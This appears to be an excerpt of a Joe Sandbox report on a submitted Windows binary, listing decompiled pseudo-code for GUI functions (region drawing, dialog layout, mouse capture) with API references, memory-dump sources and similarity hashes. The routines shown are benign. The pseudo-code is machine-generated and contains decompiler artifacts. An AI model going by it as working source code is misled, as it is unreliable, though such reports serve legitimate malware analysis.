						InflateRect( &_v32,  ~_a24,  ~_a28);
						IntersectRect( &_v32,  &_v32, _t240);
						SetRectRgn(_v68.right, _v32.left, _v32.top, _v32.right, _v32.bottom);
						CombineRgn(_v52, _v68.left, _v68.right, 3);
						if( *((intOrPtr*)(_t243 + 4)) ==  *((intOrPtr*)(_v36 + 4))) {
							E00CB9BC6(_t196,  &_v48, _t240, CreateRectRgn(0, 0, 0, 0));
							CombineRgn(_v44, _v52, _v76, 3);
						}
					}
					if( *((intOrPtr*)(_t243 + 4)) !=  *((intOrPtr*)(_v36 + 4)) && _t240 != 0) {
						E00CBA1B1(_t196,  &(_v68.bottom));
						 *0xe17a64( &_v32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 0x50))))();
						_t160 = E00CBA2B8(_t196, _v36);
						PatBlt( *(_t196 + 4), _v32.left, _v32.top, _v32.right - _v32.left, _v32.bottom - _v32.top, 0x5a0049);
						E00CBA2B8(_t196, _t160);
					}
					_t138 =  &_v48;
					if(_v44 == 0) {
						_t138 =  &_v80;
					}
					E00CBA1B1(_t196, _t138);
					 *0xe17a64( &_v32);
					 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 0x50))))();
					_t144 = E00CBA2B8(_t196, _v40);
					_t246 = _t144;
					PatBlt( *(_t196 + 4), _v32.left, _v32.top, _v32.right - _v32.left, _v32.bottom - _v32.top, 0x5a0049);
					if(_t144 != 0) {
						E00CBA2B8(_t196, _t246);
					}
					E00CBA1B1(_t196, 0);
					_v48 = 0xe1a644;
					E00CB91F0( &_v48, _t237);
					_v68.bottom = 0xe1a644;
					E00CB91F0( &(_v68.bottom), _t237);
					_v68.top = 0xe1a644;
					E00CB91F0( &(_v68.top), _t237);
					_v72 = 0xe1a644;
					E00CB91F0( &_v72, _t237);
					_v80 = 0xe1a644;
					E00CB91F0( &_v80, _t237);
					return E00DDD50E(0xe1a644, _t240, _t246);
				} else {
					_t243 = E00CC0AD8(_t196, _t202, _t243, _t258);
					_v40 = _t243;
					if(_t243 == 0) {
						E00CAA4E7(_t196, _t202, _t240, _t243, __eflags);
						asm("int3");
						_t252 = _t254;
						_t185 =  *0xe68dd4; // 0x8d2643c2
						_v52 = _t185 ^ _t252;
						_t249 = _t202;
						SetBkColor( *(_t249 + 4), _v32.right);
						_t238 = _v40;
						_t233 = _v36;
						_v68.right = _t238 + _v32;
						_v68.top = _t233;
						_v68.bottom = _v32.top + _t233;
						_v68 = _t238;
						_t193 = ExtTextOutA( *(_t249 + 4), 0, 0, 2,  &_v68, 0, 0, 0);
						__eflags = _v52 ^ _t252;
						_t250 = _t243;
						return E00DDCBCE(_t193, _t196, _v52 ^ _t252, _t238, _t240, _t250);
					} else {
						goto L2;
					}
				}
			}

0x00cc0777
0x00cc0777
0x00cc077e
0x00cc0783
0x00cc078d
0x00cc0790
0x00cc0793
0x00cc0799
0x00cc079e
0x00cc07a1
0x00cc07a4
0x00cc07a7
0x00cc07aa
0x00cc07ad
0x00cc07b0
0x00cc07b4
0x00cc07c2
0x00cc07cc
0x00cc07e2
0x00cc07ee
0x00cc0802
0x00cc080d
0x00cc0814
0x00cc0817
0x00cc0827
0x00cc082d
0x00cc0830
0x00cc0832
0x00cc0846
0x00cc084a
0x00cc084c
0x00cc084c
0x00cc0856
0x00cc0859
0x00cc085c
0x00cc085f
0x00cc0862
0x00cc0868
0x00cc087c
0x00cc088f
0x00cc089a
0x00cc08b0
0x00cc08bc
0x00cc08d1
0x00cc08e2
0x00cc08f1
0x00cc0903
0x00cc0913
0x00cc0913
0x00cc08f1
0x00cc0922
0x00cc092e
0x00cc093e
0x00cc0946
0x00cc094d
0x00cc0970
0x00cc0979
0x00cc0979
0x00cc0982
0x00cc0985
0x00cc0987
0x00cc0987
0x00cc098d
0x00cc099d
0x00cc09a5
0x00cc09ad
0x00cc09b5
0x00cc09d0
0x00cc09d8
0x00cc09dd
0x00cc09dd
0x00cc09e7
0x00cc09f4
0x00cc09f7
0x00cc09ff
0x00cc0a02
0x00cc0a0a
0x00cc0a0d
0x00cc0a15
0x00cc0a18
0x00cc0a20
0x00cc0a23
0x00cc0a2d
0x00cc0834
0x00cc0839
0x00cc083b
0x00cc0840
0x00cc0a30
0x00cc0a35
0x00cc0a37
0x00cc0a3c
0x00cc0a43
0x00cc0a4a
0x00cc0a4f
0x00cc0a55
0x00cc0a5b
0x00cc0a60
0x00cc0a68
0x00cc0a6d
0x00cc0a76
0x00cc0a81
0x00cc0a8a
0x00cc0a8c
0x00cc0a93
0x00000000
0x00000000
0x00000000
0x00cc0840

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC077E
CreateRectRgnIndirect.GDI32(?), ref: 00CC07B8
CopyRect.USER32 ref: 00CC07CC
InflateRect.USER32(?,?,?), ref: 00CC07E2
IntersectRect.USER32 ref: 00CC07EE
CreateRectRgnIndirect.GDI32(?), ref: 00CC07F8
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00CC080D
CombineRgn.GDI32(?,?,?,00000003), ref: 00CC0827
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00CC0872
SetRectRgn.GDI32(?,?,00000004,?,?), ref: 00CC088F
CopyRect.USER32 ref: 00CC089A
InflateRect.USER32(?,?,?), ref: 00CC08B0
IntersectRect.USER32 ref: 00CC08BC
SetRectRgn.GDI32(?,?,?,?,?), ref: 00CC08D1
CombineRgn.GDI32(?,?,?,00000003), ref: 00CC08E2
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00CC08F9
CombineRgn.GDI32(?,?,?,00000003), ref: 00CC0913

Part of subcall function 00CC0AD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,00000000), ref: 00CC0B1F
Part of subcall function 00CC0AD8: CreatePatternBrush.GDI32(00000000), ref: 00CC0B2C
Part of subcall function 00CC0AD8: DeleteObject.GDI32(00000000), ref: 00CC0B38

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 00CC0970

Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2DC
Part of subcall function 00CBA2B8: SelectObject.GDI32(?,00000000), ref: 00CBA2F4

PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 00CC09D0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Create$CombineObject$CopyIndirectInflateIntersectSelect$BitmapBrushDeleteH_prolog3_Pattern
String ID:
API String ID: 3480991079-0
Opcode ID: c45dd5a3ddfa4f0943eb270fdaf0539920dbc60cabab73b6a5ee104f718d4160
Instruction ID: ad064b3bdab45f319b5805c555e59652b04324021e00df5ce96cbb4bd98e3ebe
Opcode Fuzzy Hash: c45dd5a3ddfa4f0943eb270fdaf0539920dbc60cabab73b6a5ee104f718d4160
Instruction Fuzzy Hash: 1E919E72900219AFCF15DFE4DD99EEEBBB9FF08700F148169F906B2251DA359A04DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CBED1F Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00CBED1F(signed int __ecx, void* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t68;
				struct HWND__* _t70;
				struct HWND__* _t77;
				struct HWND__* _t98;
				int _t115;
				struct HWND__* _t117;
				void* _t133;
				long _t134;
				struct HWND__* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;

				_t133 = __edx;
				_t68 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t68 ^ _t138;
				_t137 = __ecx;
				_t115 = 0x3020;
				_t134 = 0;
				if( *((intOrPtr*)(__ecx + 0xd0)) == 0 && GetDlgItem( *(__ecx + 0x20), 0x3020) != 0) {
					E00CB3238(_t113, 0x200, 0, 0);
				}
				if(( *(_t137 + 0x84) & 0x01000020) != 0) {
					L11:
					_t70 = E00CB236A(_t115, _t137, _t146);
					_t116 = _t70;
					_v44 = _t70;
					if( *((intOrPtr*)(_t137 + 0xd4)) == _t134 || ( *(_t137 + 0x84) & 0x01000020) != 0) {
						L19:
						if((E00CB778C(_t137) & 0x40000000) == 0) {
							E00CB1DB5(_t137, _t133, _t134);
						}
						return E00DDCBCE(_t116, _t116, _v8 ^ _t138, _t133, _t134, _t137);
					} else {
						_v40.left = _t134;
						_v40.top = _t134;
						_v40.right = _t134;
						_v40.bottom = _t134;
						GetWindowRect( *(_t137 + 0x20),  &_v40);
						_v24.left = _t134;
						_v24.top = _t134;
						_v24.right = _t134;
						_v24.bottom = _t134;
						_t77 = GetDlgItem( *(_t137 + 0x20), 1);
						if(_t77 != 0) {
							GetWindowRect(_t77,  &_v24);
							E00CB7A83(_t137, _t134, _t134, _t134, _v40.right - _v40.left, _v24.top - _v40.top, 0x16);
						}
						do {
							_t62 = _t134 + 0xe68298; // 0x1
							_t117 = GetDlgItem( *(_t137 + 0x20),  *_t62);
							if(_t117 != 0) {
								ShowWindow(_t117, 0);
								EnableWindow(_t117, 0);
							}
							_t134 = _t134 + 4;
						} while (_t134 < 0x10);
						_t116 = _v44;
						_t134 = 0;
						goto L19;
					}
				} else {
					_t135 = GetDlgItem( *(_t137 + 0x20), _t115);
					_v24.left = 0;
					_v24.top = 0;
					_v24.right = 0;
					_v24.bottom = 0;
					GetWindowRect(_t135,  &_v24);
					E00CBA172(_t137,  &_v24);
					_v40.left = 0;
					_v40.top = 0;
					_v40.right = 0;
					_v40.bottom = 0x20;
					MapDialogRect( *(_t137 + 0x20),  &_v40);
					_t115 = _v24.bottom;
					if(_v40.bottom >= _t115) {
						_t134 = 0;
						__eflags = 0;
						goto L11;
					}
					_t115 = _t115 - _v24.top - _v40.bottom;
					SetWindowPos(_t135, 0, 0, 0, _v24.right - _v24.left, _v40.bottom, 0x16);
					_t136 = 0;
					do {
						_t27 = _t136 + 0xe68298; // 0x1
						_t98 = GetDlgItem( *(_t137 + 0x20),  *_t27);
						_v44 = _t98;
						if(_t98 != 0) {
							GetWindowRect(_t98,  &_v24);
							E00CBA172(_t137,  &_v24);
							SetWindowPos(_v44, 0, _v24.left, _v24.top - _t115, 0, 0, 0x15);
						}
						_t136 = _t136 + 4;
						_t146 = _t136 - 0x10;
					} while (_t136 < 0x10);
					GetWindowRect( *(_t137 + 0x20),  &_v24);
					_t134 = 0;
					E00CB7A83(_t137, 0, 0, 0, _v24.right - _v24, _v24.bottom - _v24.top - _t115, 0x16);
					goto L11;
				}
			}

0x00cbed1f
0x00cbed25
0x00cbed2c
0x00cbed31
0x00cbed33
0x00cbed39
0x00cbed41
0x00cbed59
0x00cbed59
0x00cbed68
0x00cbee63
0x00cbee65
0x00cbee6a
0x00cbee6c
0x00cbee75
0x00cbef18
0x00cbef24
0x00cbef29
0x00cbef29
0x00cbef3e
0x00cbee8b
0x00cbee8e
0x00cbee95
0x00cbee98
0x00cbee9b
0x00cbee9e
0x00cbeea9
0x00cbeeac
0x00cbeeaf
0x00cbeeb2
0x00cbeeb5
0x00cbeebd
0x00cbeec4
0x00cbeedf
0x00cbeedf
0x00cbeee4
0x00cbeee4
0x00cbeef3
0x00cbeef7
0x00cbeefc
0x00cbef05
0x00cbef05
0x00cbef0b
0x00cbef0e
0x00cbef13
0x00cbef16
0x00000000
0x00cbef16
0x00cbed6e
0x00cbed78
0x00cbed7f
0x00cbed84
0x00cbed87
0x00cbed8a
0x00cbed8d
0x00cbed99
0x00cbeda1
0x00cbeda8
0x00cbedab
0x00cbedae
0x00cbedb5
0x00cbedbb
0x00cbedc1
0x00cbee61
0x00cbee61
0x00000000
0x00cbee61
0x00cbedd0
0x00cbeddf
0x00cbede5
0x00cbede7
0x00cbede7
0x00cbedf0
0x00cbedf6
0x00cbedfb
0x00cbee02
0x00cbee0e
0x00cbee26
0x00cbee26
0x00cbee2c
0x00cbee2f
0x00cbee2f
0x00cbee3b
0x00cbee44
0x00cbee5a
0x00000000
0x00cbee5a

APIs

GetDlgItem.USER32 ref: 00CBED47
GetDlgItem.USER32 ref: 00CBED72
GetWindowRect.USER32 ref: 00CBED8D
MapDialogRect.USER32(?,?), ref: 00CBEDB5
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,00000020,00000016), ref: 00CBEDDF
GetDlgItem.USER32 ref: 00CBEDF0
GetWindowRect.USER32 ref: 00CBEE02
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015,?), ref: 00CBEE26
GetWindowRect.USER32 ref: 00CBEE3B
GetWindowRect.USER32 ref: 00CBEE9E
GetDlgItem.USER32 ref: 00CBEEB5
GetWindowRect.USER32 ref: 00CBEEC4
GetDlgItem.USER32 ref: 00CBEEED
ShowWindow.USER32(00000000,00000000), ref: 00CBEEFC
EnableWindow.USER32(00000000,00000000), ref: 00CBEF05

Strings

, xrefs: 00CBEDAE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Rect$Item$DialogEnableShow
String ID:
API String ID: 763981185-3916222277
Opcode ID: f6e2ff1cb93d147c54bdabdbc09fb5b5c94980a3f4f8c9ae6b73495c18f99128
Instruction ID: c2e56d230d76f69ab64a7405fa4df83da91078e2bf6edd40cc2930597a236ce8
Opcode Fuzzy Hash: f6e2ff1cb93d147c54bdabdbc09fb5b5c94980a3f4f8c9ae6b73495c18f99128
Instruction Fuzzy Hash: 1D610A71A00209AFDB11DFA9CD88AEFBBB9FF48701F10451AF555B2251DB709E05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CFCF2B Relevance: 27.3, APIs: 18, Instructions: 277
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00CFCF2B(intOrPtr* __ecx, long __edx, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				int _v44;
				signed int _v48;
				long _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t108;
				signed int _t113;
				long _t117;
				signed int _t123;
				signed int _t133;
				signed int _t138;
				signed int _t146;
				signed int _t152;
				signed int _t158;
				signed int _t162;
				void* _t164;
				signed int _t166;
				signed int _t167;
				signed int _t169;
				int _t174;
				signed int _t175;
				signed int _t188;
				signed int _t191;
				long _t209;
				intOrPtr* _t210;
				intOrPtr _t217;
				RECT* _t221;
				signed int _t222;

				_t209 = __edx;
				_t176 = __ecx;
				_t108 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t108 ^ _t222;
				_t210 = __ecx;
				_t174 = 0;
				if( *((intOrPtr*)(__ecx + 0x1fc)) == 0) {
					L4:
					__eflags =  *(_t210 + 0xc4) -  *(_t210 + 0xc0);
					if( *(_t210 + 0xc4) ==  *(_t210 + 0xc0)) {
						L9:
						__eflags =  *(_t210 + 0x158) - _t174;
						if( *(_t210 + 0x158) != _t174) {
							 *(_t210 + 0x158) = _t174;
							ReleaseCapture();
							 *0xe17a64();
							_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x2cc))))();
							__eflags = _t162;
							if(_t162 == 0) {
								 *(_t210 + 0x118) =  *(_t210 + 0x118) | 0xffffffff;
								_t25 = _t210 + 0x114;
								 *_t25 =  *(_t210 + 0x114) | 0xffffffff;
								__eflags =  *_t25;
							}
						}
						 *0xe17a64();
						_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x2cc))))();
						__eflags = _t113;
						if(_t113 == 0) {
							L32:
							_t212 =  *((intOrPtr*)( *_t210 + 0x288));
							 *0xe17a64();
							__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x288))))();
							if(__eflags != 0) {
								_v40.left = _t174;
								_t212 =  *((intOrPtr*)( *_t210 + 0x168));
								_v40.top = _t174;
								_v40.right = _t174;
								_v40.bottom = _t174;
								_v24.left = _t174;
								_v24.top = _t174;
								_v24.right = _t174;
								_v24.bottom = _t174;
								 *0xe17a64( &_v40,  &_v24);
								 *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x168))))();
								_t123 = IsRectEmpty( &_v40);
								__eflags = _t123;
								if(_t123 == 0) {
									InvalidateRect( *(_t210 + 0x20),  &_v40, _t174);
								}
								__eflags = IsRectEmpty( &_v24);
								if(__eflags == 0) {
									InvalidateRect( *(_t210 + 0x20),  &_v24, _t174);
								}
								UpdateWindow( *(_t210 + 0x20));
							}
							_t117 = E00CB236A(_t174, _t210, __eflags);
							goto L39;
						} else {
							_t174 =  *(_t210 + 0x114);
							_t188 =  *(_t210 + 0x118);
							_t209 =  *(_t210 + 0xc0);
							_v52 = _t209;
							_v44 = _t174;
							_v48 = _t188;
							__eflags = _t174 - _t188;
							if(_t174 != _t188) {
								L21:
								 *(_t210 + 0x118) =  *(_t210 + 0x118) | 0xffffffff;
								 *0xe17a64();
								_t133 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x288))))();
								__eflags = _t133;
								if(_t133 == 0) {
									_t65 = _t210 + 0x114;
									 *_t65 =  *(_t210 + 0x114) | 0xffffffff;
									__eflags =  *_t65;
								}
								ReleaseCapture();
								__eflags = _v52 - _t174;
								if(_v52 == _t174) {
									L31:
									_t174 = 0;
									__eflags = 0;
									goto L32;
								} else {
									_t175 = _v44;
									__eflags = _t175;
									if(_t175 >= 0) {
										_v24.left = 0;
										_v24.top = 0;
										_v24.right = 0;
										_v24.bottom = 0;
										 *0xe17a64(_t175,  &_v24);
										_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x1b8))))();
										__eflags = _t146;
										if(_t146 != 0) {
											InvalidateRect( *(_t210 + 0x20),  &_v24, 1);
											UpdateWindow( *(_t210 + 0x20));
										}
									}
									_t191 = _v48;
									__eflags = _t191 - _t175;
									if(_t191 == _t175) {
										goto L31;
									} else {
										_t174 = 0;
										__eflags = _t191;
										if(_t191 >= 0) {
											_v24.left = 0;
											_v24.top = 0;
											_v24.right = 0;
											_v24.bottom = 0;
											 *0xe17a64(_t191,  &_v24);
											_t138 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x1b8))))();
											__eflags = _t138;
											if(_t138 != 0) {
												InvalidateRect( *(_t210 + 0x20),  &_v24, 1);
												UpdateWindow( *(_t210 + 0x20));
											}
										}
										goto L32;
									}
								}
							}
							_v44 = _t174;
							_v48 = _t188;
							__eflags = _t174;
							if(_t174 < 0) {
								goto L21;
							}
							_v44 = _t174;
							_v48 = _t188;
							__eflags = _t174 - _t209;
							if(_t174 == _t209) {
								goto L21;
							}
							 *(_t210 + 0x24c) =  *(_t210 + 0x24c) & 0x00000000;
							 *(_t210 + 0x1e4) = _t209;
							 *(_t210 + 0x1f0) = 1;
							 *0xe17a64(_t174);
							_t152 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x214))))();
							_t217 =  *_t210;
							__eflags = _t152;
							if(_t152 != 0) {
								 *0xe17a64( *(_t210 + 0xc0));
								 *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x270))))();
								 *(_t210 + 0x1f0) =  *(_t210 + 0x1f0) & 0x00000000;
								_t57 = _t210 + 0x24c;
								 *_t57 =  *(_t210 + 0x24c) & 0x00000000;
								__eflags =  *_t57;
								_v44 =  *(_t210 + 0x114);
								_v48 =  *(_t210 + 0x118);
								goto L21;
							}
							_t212 =  *((intOrPtr*)(_t217 + 0x288));
							 *(_t210 + 0x1f0) =  *(_t210 + 0x1f0) & _t152;
							 *(_t210 + 0x24c) =  *(_t210 + 0x24c) & _t152;
							 *(_t210 + 0x118) =  *(_t210 + 0x118) | 0xffffffff;
							 *0xe17a64();
							_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x288))))();
							__eflags = _t158;
							if(_t158 == 0) {
								_t50 = _t210 + 0x114;
								 *_t50 =  *(_t210 + 0x114) | 0xffffffff;
								__eflags =  *_t50;
							}
							_t117 = ReleaseCapture();
							L39:
							return E00DDCBCE(_t117, _t174, _v8 ^ _t222, _t209, _t210, _t212);
						}
					}
					_t164 = E00CB277F(_t174, _t176, _t209, GetParent( *(_t210 + 0x20)));
					_t220 = _t164;
					SendMessageA( *(_t164 + 0x20),  *0xe87d34,  *(_t210 + 0xc4),  *(_t210 + 0xc0));
					_t166 = E00CACB0B(_t164, 0xe2a530);
					__eflags = _t166;
					if(_t166 != 0) {
						L7:
						_t167 = E00CD8851(_t209, _t220);
						__eflags = _t167;
						if(_t167 != 0) {
							SendMessageA( *(_t167 + 0x20),  *0xe87d34,  *(_t210 + 0xc4),  *(_t210 + 0xc0));
						}
						goto L9;
					}
					_t169 = E00CACB0B(_t220, 0xe303f0);
					__eflags = _t169;
					if(_t169 == 0) {
						goto L9;
					}
					goto L7;
				}
				_t221 = __ecx + 0x200;
				 *((intOrPtr*)(__ecx + 0x1fc)) = 0;
				 *((intOrPtr*)(__ecx + 0x1f8)) = 0;
				RedrawWindow( *(__ecx + 0x20), _t221, 0, 0x105);
				_push(_a12);
				if(PtInRect(_t221, _a8) == 0) {
					goto L4;
				} else {
					_t212 =  *((intOrPtr*)( *_t210 + 0x210));
					 *0xe17a64();
					_t117 =  *((intOrPtr*)( *((intOrPtr*)( *_t210 + 0x210))))();
					if(_t117 != 0) {
						_t117 = SendMessageA( *(_t117 + 0x20), 0x10, 0, 0);
					}
					goto L39;
				}
			}

0x00cfcf2b
0x00cfcf2b
0x00cfcf31
0x00cfcf38
0x00cfcf3e
0x00cfcf40
0x00cfcf48
0x00cfcfab
0x00cfcfb1
0x00cfcfb7
0x00cfd02b
0x00cfd02b
0x00cfd031
0x00cfd033
0x00cfd039
0x00cfd049
0x00cfd051
0x00cfd053
0x00cfd055
0x00cfd057
0x00cfd05e
0x00cfd05e
0x00cfd05e
0x00cfd05e
0x00cfd055
0x00cfd06f
0x00cfd077
0x00cfd079
0x00cfd07b
0x00cfd236
0x00cfd238
0x00cfd240
0x00cfd24a
0x00cfd24c
0x00cfd257
0x00cfd25b
0x00cfd263
0x00cfd266
0x00cfd269
0x00cfd26c
0x00cfd26f
0x00cfd272
0x00cfd275
0x00cfd278
0x00cfd280
0x00cfd286
0x00cfd28c
0x00cfd28e
0x00cfd298
0x00cfd298
0x00cfd2a8
0x00cfd2aa
0x00cfd2b4
0x00cfd2b4
0x00cfd2bd
0x00cfd2bd
0x00cfd2c5
0x00000000
0x00cfd081
0x00cfd081
0x00cfd087
0x00cfd08d
0x00cfd093
0x00cfd096
0x00cfd099
0x00cfd09c
0x00cfd09e
0x00cfd165
0x00cfd167
0x00cfd176
0x00cfd17e
0x00cfd180
0x00cfd182
0x00cfd184
0x00cfd184
0x00cfd184
0x00cfd184
0x00cfd18b
0x00cfd191
0x00cfd194
0x00cfd234
0x00cfd234
0x00cfd234
0x00000000
0x00cfd19a
0x00cfd19a
0x00cfd19d
0x00cfd19f
0x00cfd1a3
0x00cfd1a6
0x00cfd1a9
0x00cfd1ac
0x00cfd1be
0x00cfd1c6
0x00cfd1c8
0x00cfd1ca
0x00cfd1d5
0x00cfd1de
0x00cfd1de
0x00cfd1ca
0x00cfd1e4
0x00cfd1e7
0x00cfd1e9
0x00000000
0x00cfd1eb
0x00cfd1eb
0x00cfd1ed
0x00cfd1ef
0x00cfd1f3
0x00cfd1f6
0x00cfd1f9
0x00cfd209
0x00cfd20c
0x00cfd214
0x00cfd216
0x00cfd218
0x00cfd223
0x00cfd22c
0x00cfd22c
0x00cfd218
0x00000000
0x00cfd1ef
0x00cfd1e9
0x00cfd194
0x00cfd0a4
0x00cfd0a7
0x00cfd0aa
0x00cfd0ac
0x00000000
0x00000000
0x00cfd0b2
0x00cfd0b5
0x00cfd0b8
0x00cfd0ba
0x00000000
0x00000000
0x00cfd0c2
0x00cfd0ca
0x00cfd0d8
0x00cfd0e2
0x00cfd0ea
0x00cfd0ec
0x00cfd0ee
0x00cfd0f0
0x00cfd13b
0x00cfd143
0x00cfd14b
0x00cfd152
0x00cfd152
0x00cfd152
0x00cfd159
0x00cfd162
0x00000000
0x00cfd162
0x00cfd0f2
0x00cfd0fa
0x00cfd100
0x00cfd106
0x00cfd10d
0x00cfd115
0x00cfd117
0x00cfd119
0x00cfd11b
0x00cfd11b
0x00cfd11b
0x00cfd11b
0x00cfd122
0x00cfd2ca
0x00cfd2d8
0x00cfd2d8
0x00cfd07b
0x00cfcfc3
0x00cfcfce
0x00cfcfdf
0x00cfcfec
0x00cfcff1
0x00cfcff3
0x00cfd005
0x00cfd006
0x00cfd00c
0x00cfd00e
0x00cfd025
0x00cfd025
0x00000000
0x00cfd00e
0x00cfcffc
0x00cfd001
0x00cfd003
0x00000000
0x00000000
0x00000000
0x00cfd003
0x00cfcf50
0x00cfcf56
0x00cfcf60
0x00cfcf66
0x00cfcf6c
0x00cfcf7b
0x00000000
0x00cfcf7d
0x00cfcf7f
0x00cfcf87
0x00cfcf8f
0x00cfcf93
0x00cfcfa0
0x00cfcfa0
0x00000000
0x00cfcf93

APIs

RedrawWindow.USER32(?,?,00000000,00000105), ref: 00CFCF66
PtInRect.USER32(?,?,?), ref: 00CFCF73
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00CFCFA0
GetParent.USER32(?), ref: 00CFCFBC
SendMessageA.USER32(?,?,?,00000000), ref: 00CFCFDF
SendMessageA.USER32(?,?,?,00E2A530), ref: 00CFD025
ReleaseCapture.USER32 ref: 00CFD039
ReleaseCapture.USER32 ref: 00CFD122
ReleaseCapture.USER32 ref: 00CFD18B
InvalidateRect.USER32(?,?,00000001), ref: 00CFD1D5
UpdateWindow.USER32(?), ref: 00CFD1DE
InvalidateRect.USER32(?,?,00000001), ref: 00CFD223
UpdateWindow.USER32(?), ref: 00CFD22C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CaptureMessageRectReleaseSendWindow$InvalidateUpdate$ParentRedraw
String ID:
API String ID: 3937359674-0
Opcode ID: 1cf135ff580459359742e7285136f5ca95f83e5e5eec2d3f544af2bfe8d2a068
Instruction ID: 919e1f245b70e63c9f98568abda9d87bf1f6a1483e72d9168c17732f43010858
Opcode Fuzzy Hash: 1cf135ff580459359742e7285136f5ca95f83e5e5eec2d3f544af2bfe8d2a068
Instruction Fuzzy Hash: 3DB18571A0060ADFCB489F65CD84AFDBBB6FF08711F104169E526A32A0DB30AE15CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA24AB Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00CA24AB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t127;
				intOrPtr* _t128;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				signed int _t134;
				intOrPtr* _t135;
				signed int _t138;
				intOrPtr* _t139;
				intOrPtr* _t140;
				intOrPtr* _t142;
				intOrPtr* _t144;
				signed int _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				intOrPtr* _t150;
				intOrPtr* _t152;
				intOrPtr* _t156;
				intOrPtr* _t157;
				void* _t158;
				intOrPtr* _t160;
				signed int _t162;
				intOrPtr* _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				intOrPtr* _t170;
				short _t172;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				void* _t184;
				signed int _t196;
